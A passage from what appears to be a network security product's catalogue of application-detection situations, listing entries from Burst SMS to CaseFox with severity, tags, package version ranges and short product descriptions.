Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Burst SMS - SMS marketing system
Back to top

Burstorm

About this situation: Application Burstorm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Burstorm provide CAD applications for cloud architects.
Back to top

Business and Economy

About this situation: Sites sponsored by or devoted to business firms, business associations, industry groups or general business.
Context: URL Application Context
Severity: 1
Tags: Business and Economy, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or devoted to business firms, business associations, industry groups or general business.
Back to top

Business-Exchange

About this situation: Application Business-Exchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Exchange allows you to collect and share testimonials, sell products or services, find the best suppliers for your needs, and boost your company's reputation.
Back to top

Business-Plan-Pro-Complete

About this situation: Application Business-Plan-Pro-Complete detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Plan Pro is the way to create a business plan. Sample Plan Browser lets you quickly find the plan that meets your needs. Then you can write up the plan in your own words (step-by-step guidance makes it a snap
Back to top

Business-Plus-Accounting-Touch-Screen-Point-of-Sale

About this situation: Application Business-Plus-Accounting-Touch-Screen-Point-of-Sale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Plus Accounting Touch Screen Point of Sale System is fully complete with a point of sale and integrated accounting software package.
Back to top

Business-Safety-Systems

About this situation: Application Business-Safety-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Safety Systems provides online management system for health and safety training.
Back to top

Business-Wire

About this situation: Application Business-Wire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Business Wire is a company that disseminates full-text news releases from companies and organizations to news media, financial markets, disclosure systems, investors, information web sites, databases, bloggers, social networks and other audiences.
Back to top

Businessolver

About this situation: Application Businessolver detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Businessolver delivers benefits administration solutions and services.
Back to top

Buxfer

About this situation: Application Buxfer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Buxfer provides online money management software for personal finance, account aggregation, budgeting, bill reminders and forecasting. Also useful for splitting rent, grocery, restaurant bills and IOUs with friends and roommates.
Back to top

Buycraft

About this situation: Application Buycraft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Buycraft is a plugin for funding Minecraft community.
Back to top

BuyDomains

About this situation: Application BuyDomains detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BuyDomains helps business owners and entrepreneurs create online presence and find the domain name.
Back to top

buySAFE

About this situation: Application buySAFE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: buySAFE is a comprehensive consumer confidence program for online retailers. Increase customer satisfaction.
Back to top

BuySellAds

About this situation: Application BuySellAds detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BuySellAds is an online advertising network.
Back to top

Buzzfeed

About this situation: Buzzfeed usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-595-5211
Description: Buzzfeed usage detected. Buzzfeed is a social news and entertainment website.
Back to top

Buzznet

About this situation: Buzznet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

BuzzTouch

About this situation: Application BuzzTouch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Buzztouch is an open source
Back to top

Bxp-software

About this situation: Application Bxp-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Bxp contact centre software provides a range of CRM, Contact Centre Management, eLearning and Quality Assurance tools aimed at maximising efficiency and profitability
Back to top

Byallaccounts

About this situation: Application Byallaccounts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ByAllAccounts, the financial advisor's choice for account aggregation, is the only service that retrieves, enriches and consolidates reconciliation-ready account data from any custodian.
Back to top

BYOD-Portal

About this situation: Application BYOD-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The BYOD Portal provides end user device registration experience and self service device management portal.
Back to top

BypassThat

About this situation: BypassThat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-636-5211
Description: Bypassthat offers a free proxy service.
Back to top

ByteDance

About this situation: ByteDance usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1715-5242
Description: ByteDance is a chinese technology company concentrated in entertainment and news platformas. This application seems to gather data, possibly also private data.
Back to top

C2-Atom

About this situation: Application C2-Atom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: C2 ATOM - Optimize the Performance of your IT Services
Back to top

CA Certificate warning

About this situation: CA Certificate warning
Context: Management Server situation
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: CA Certificate warning : This certificate expires soon (in less than 180 days).
Back to top

CA-Technologies

About this situation: Application CA-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CA Technologies engages in the design, development, marketing, licensing, and support of information technology management software products.
Back to top

CA-UIM-Snap

About this situation: CA UIM Snap usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-644-5211
Description: CA Unified Infrastructure Manager (UIM) is an IT monitoring solution, formerly known as Nimsoft Monitor. The solution relies on the proprietary Nimbus protocol for communications.
Back to top

CAcert

About this situation: Application CAcert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CAcert is a world wide association running a free certificates authority built upon a web of trust of notaries
Back to top

CacheFly

About this situation: CacheFly CDN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Description: CacheFly content delivery network usage has been detected.
Back to top

Cacoo

About this situation: Cacoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Cacoo is a user friendly online drawing tool that allows you to create a variety of diagrams such as site map, flowchart, mind map, wire frame, UML diagram and network diagram.
Back to top

Cacti

About this situation: Application Cacti detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cacti is an open-source, web-based network monitoring and graphing tool designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.
Back to top

Cadebill

About this situation: Application Cadebill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cadebill base system is a convergent billing solution for Telephone companies, wireless companies, cable companies, ISPs, local telephone companies.
Back to top

Cadence

About this situation: Application Cadence detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cadence is a provider of EDA and semiconductor IP. Our custom
Back to top

Cae

About this situation: Application Cae detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CAE is providing comprehensive training solutions based on world-leading simulation technology and integrated training services. The company employs 8,000 people at more than 160 sites and training locations in 35 countries.
Back to top

CafePress.com

About this situation: Application CafePress.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CafePress is an online retailer of stock and user-customized on demand products. The site also allows the user to have a virtual CafePress shop including an online storefront and website hosting, order management, fulfillment, payment processing, and customer service.
Back to top

CaGBC

About this situation: Application CaGBC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The CaGBC is dedicated to promoting the LEED rating system. Their mission is to lead and accelerate the transformation to high-performing, healthy green buildings, homes and communities throughout Canada.
Back to top

CaiHong-Instant-Messaging

About this situation: CaiHong instant messaging usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-630-5211
Description: CaiHong is a Chinese instant messaging application which allows users to communicate with each other in real time.
Back to top

Cain-Travel

About this situation: Application Cain-Travel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cain Travel provides a set of travel management solutions to large and small companies.
Back to top

CakeHR

About this situation: Application CakeHR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CakeHR is an HR software to manage employees. It provides tool to manage staff leave and employee information.
Back to top

Cakemail

About this situation: CakeMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: With CakeMail you can Easily customize any of the professional and elegant email marketing templates to make them your own. CakeMail will deliver emails in a snap, whether you send 25 or 2.5M emails. You can see how many people opened your emails, who clicked, where and when.
Back to top

Calamari

About this situation: Application Calamari detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Calamari helps you in leave management and tracking attendance. It automates PTO calculation. Many ways to clock in or out, it's also integrated with Google Apps, Slack, Jira and Office 365.
Back to top

Calibration-Control-(Ape-Software)

About this situation: Application Calibration-Control-(Ape-Software) detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ape Software offers calibration management software
Back to top

Call-Measurement

About this situation: Application Call-Measurement detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Call Measurement this is the reporting website for call measurement and click measurement solutions, allows an advertiser to track and measure the response of an ad.
Back to top

Callbright

About this situation: Application Callbright detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Callbright provides real-time telephone communication tracking via web-based tools capitalizing on cutting-edge technologies. With tools to track advertising effectiveness, record and monitor calls, and send broadcast messages, Callbright assists in optimizing marketing investments and enhancing customer relationships.
Back to top

CallFire

About this situation: Application CallFire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CallFire helps to grow your business with virtual phone numbers, IVR, voice broadcasting, mass text messaging services and power dialing.
Back to top

CallidusCloud

About this situation: Application CallidusCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CallidusCloud marketing automation, configure price quote, sales enablement and sales compensation solutions.
Back to top

CallPro-CRM

About this situation: Application CallPro-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CallPro CRM bridges the gap between Call Center Software, cloud-based CRM, and Lead Generation campaign management as e-Marketing and Call Centric CRM. It is CRM designed to increase calls and sales, built-in smart e-marketing to increase leads, and is affordable with no annual contract. In addition, CallPro CRM is fully integrated with Quickbooks so not only is the sales and marketing taken care of, but the e-marketing in CallPro CRM can also be used for automatic reminders on overdue invoices - so cash collection is also greatly improved.
Back to top

CALUMO

About this situation: Application CALUMO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Solution for metrics and KPIs reporting and analysis budgeting, financial forecasting, financial consolidations.
Back to top

Cambridge-Associates

About this situation: Application Cambridge-Associates detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cambridge Associates is a investment advisor to foundations and endowments, private wealth, and corporate and government entities.
Back to top

Cambridgesoft

About this situation: Application Cambridgesoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PerkinElmer, Inc. focused on improving Human and Environmental health, we are helping scientists, clinicians, and government agencies discover more effective diagnostics and therapies, and making sure that the food we eat and the air we breathe are safe from contaminants.
Back to top

Camfrog-Video-Chat

About this situation: Camfrog Video Chat usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-628-5211
Description: Camfrog Video Chat is a video chat software that allows people to video chat with their friends.
Back to top

Campaign-Manager

About this situation: Application Campaign-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Campaign Manager is online communications platform allows to create and send professionally designed email campaigns, segment contact lists, test campaigns, track customer engagement.
Back to top

Campaign-Monitor

About this situation: Campaign Monitor usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Allowes users to backup Files to the Cloud.
Back to top

Campaigner

About this situation: Application Campaigner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Campaigner provides sales and marketing solution. It uses training programs, incentive systems, peer ranking, and technology to produce the results in retail sales and marketing, experiential marketing, promotional marketing services, market intelligence.
Back to top

Campaignercrm

About this situation: CampaignerCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, Integrated Email Marketing, add tasks, track communication logs, Unlimited Email Support, and close deals.
Back to top

Campfire

About this situation: Campfire usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-630-5211
Description: Campfire is a business-oriented online chat service provided by 37signals.
Back to top

Camstar

About this situation: Application Camstar detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Camstar, a Siemens Business, enables global networks of manufacturers, brand owners and suppliers to produce the highest quality products, quickly and efficiently. Camstar provides the world's easiest to use and most robust manufacturing execution systems
Back to top

Canalplus

About this situation: Canalplus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Description: Canal+ is French television channel that provides live programmes and streaming services. This application situation is meant for blocking the application.
Back to top

Candy-Crush

About this situation: Candy Crush usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games
First detected in: sgpkg-ips-924-5242
Last changed: sgpkg-ips-927-5242
Description: Candy Crush is a popular game, available for playing online and for download.
Back to top

Candystand

About this situation: Candystand usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Canonical

About this situation: Canonical usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-630-5211
Description: Canonical is the company supporting Ubuntu Linux distribution and it offers various related services.
Back to top

Canonical-Landscape

About this situation: Canonical Landscape usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-630-5211
Description: Canonical Landscape a remote management and monitor system for Ubuntu based computers.
Back to top

Canopus-EpaySuite

About this situation: Application Canopus-EpaySuite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Canopus EpaySuite is an software solution designed for the automation of payment systems, e-money issuers and payment service providers.
Back to top

Canopy-Office

About this situation: Application Canopy-Office detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Canopy Office is an business management solution for small companies - with CRM, Email, Invoicing, Calendar.
Back to top

Canva

About this situation: Application Canva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Canva online design platform allow create designs for Web or print: blog graphics, presentations, Facebook covers, flyers, posters, and invitations.
Back to top

Canvas

About this situation: Application Canvas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Canvas service helps you replace paper forms and processes with efficient mobile business apps and forms to save money and time on data collection.
Back to top

Canvas-LMS

About this situation: Application Canvas-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Canvas is an open-source learning management system
Back to top

Canvas-Network

About this situation: Application Canvas-Network detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Canvas Network offers online courses and classes from the world's leading universities.
Back to top

Capillary

About this situation: Application Capillary detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Capillary offers Customer Engagement Management solutions that enable retail marketers to manage customer data, gain insights and personalize engagement.
Back to top

Capita

About this situation: Application Capita detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Capita are the UK's No. 1 business process outsourcing
Back to top

Capital-Office-Products

About this situation: Application Capital-Office-Products detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Capital Office Products provide the highest level customer service through direct communication with our customers honestly and with integrity while providing substantial savings. Whether you're a small start-up business or a national corporation with thousands of employees, Capital can satisfy all your office needs. From copy paper and post-it notes to inks and toners to janitorial and breakroom supplies to an entire suite of furniture, we're there every step of the way.
Back to top

Capital-One-360

About this situation: Application Capital-One-360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CapitalOne 360 is an online banking division of Capital One.
Back to top

Capital-One-Investing

About this situation: Application Capital-One-Investing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Capital One Investing is an online brokerage firm. Investors can buy stocks, bonds, options, mutual funds, and exchange-traded funds as partial shares via Automatic Investing and PortfolioBuilder.
Back to top

Capital-Plus-Inc.

About this situation: Application Capital-Plus-Inc. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: First Capital Plus Bank, Online banking
Back to top

CapitalIQ

About this situation: Application CapitalIQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SandP Capital IQ is a multinational financial information provider
Back to top

CapLinked

About this situation: Application CapLinked detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CapLinked is a secure collaboration and workflow solution for managing complex deals and projects.
Back to top

Capriccio-Fuzion

About this situation: Capriccio Fuzion usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-636-5211
Description: This web CRM allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Capsulecrm

About this situation: CapsuleCRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to keep track of clients and prospects, add tasks, track communication logs, and close deals.
Back to top

Capterra

About this situation: Application Capterra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Capterra is a service that enables organizations to find software by identifying and navigating choices.
Back to top

Captoom

About this situation: Application Captoom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Captoom allows you to quickly record an image for a receipts, edit the desired details and store them.
Back to top

Carbonite

About this situation: Carbonite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: An automated online backup service; Source Carbonite
Back to top

CardDAV

About this situation: CardDAV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1620-5242
Description: CardDAV is a protocol based on WebDAV used to specify a standard for accessing and sharing contacts over the network.
Back to top

CardMunch

About this situation: Application CardMunch detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CardMunch is a business-oriented social networking service
Back to top

Care2-E-Mail

About this situation: Care2 E-mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

CareCloud

About this situation: Application CareCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CareCloud Innovative cloud-based practice management and EHR software, revenue cycle management and patient engagement.
Back to top

Career-Cruising

About this situation: Application Career-Cruising detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Career Cruising dedicated to creating innovative products capable of engaging and inspiring people of all ages to achieve their full potential in school, career and life.
Back to top

Career-Innovation-Zone

About this situation: Application Career-Innovation-Zone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: With CiZone online career tools, you can provide career resources and support across your whole organisation 24/7.
Back to top

Careerassport

About this situation: Application Careerassport detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Careerpassport is an affordable online recruiting software for agencies, employers and job boards for recruitment management.
Back to top

CareerBuilder

About this situation: Application CareerBuilder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CareerBuilder.com an employment website in the United States. CareerBuilder.com provides labor market intelligence, talent management software, and other recruitment solutions, including online career search services.
Back to top

CarePilot

About this situation: Application CarePilot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CarePilot is an online platform that makes it safer, smarter and simpler for Australians and their families to find, fund and manage care at home.
Back to top

Caretime

About this situation: Application Caretime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Caretime provides integrated suite of homecare software applications that include telephone timekeeping, a webclock, scheduling, 2 way voice mail, random voice verification, payroll and billing, Quickbooks interface and SMS text messaging for employee no shows.
Back to top

Carlsonsw

About this situation: Application Carlsonsw detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Carlson Software develops and provides software solutions that bring the land development professional from concept to completion,
Back to top

Carrier-Access-Billing-System

About this situation: Application Carrier-Access-Billing-System detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MACC is carrier access billing system that includes consolidated billing, audit trail, route monitoring and maintenance capabilities.
Back to top

Cart2Cart

About this situation: Application Cart2Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cart2Cart is an automated shopping cart migration solution that lets you transfer data automatically within 75
Back to top

Cartavi

About this situation: Application Cartavi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cartavi is now DocuSign Transaction Rooms an integral part of the DocuSign for Real Estate PLUS offering.
Back to top

Cartloom

About this situation: Application Cartloom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cartloom - a shopping center on the Internet - trading with the designer sites. Cartloom allows buyers to choose from a huge number of proposals, and companies post information about products and services provided
Back to top

Cas-pia

About this situation: Application Cas-pia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CAS Software AG is German provider of CRM solutions for small and medium-sized enterprises. AS Software AG has become the German, market-leading innovator for customer relations management
Back to top

Cascade-HR

About this situation: Application Cascade-HR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cascade is provider of fully integrated HR software and HMRC recognised payroll software. Including core HR, Payroll, Training, Recruitment, Online Recruitment, Self Service, Workflow, Auto Enrolment, Timesheets and Expenses.
Back to top

CaseFox

About this situation: Application CaseFox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
